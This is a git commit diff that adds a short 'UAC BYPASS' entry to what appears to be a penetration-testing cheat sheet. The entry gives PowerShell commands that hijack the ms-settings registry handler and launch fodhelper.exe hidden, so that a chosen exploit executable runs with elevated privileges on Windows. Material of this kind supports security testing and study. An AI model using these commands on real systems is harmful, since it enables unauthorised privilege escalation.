Update README.md

This commit is contained in:
Joe Totes
2022-09-22 00:30:06 -04:00
committed by GitHub
parent a7b5e9ea46
commit 85e5f3e96c

View File

@@ -889,6 +889,13 @@ python3 exploit.py
# Check user and groups # Check user and groups
whoami whoami
net user {USERNAME} net user {USERNAME}
# UAC BYPASS
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value {C:\Path\to\Exploit\exploit.exe} -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper
powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden
``` ```
#### Credential Access #### Credential Access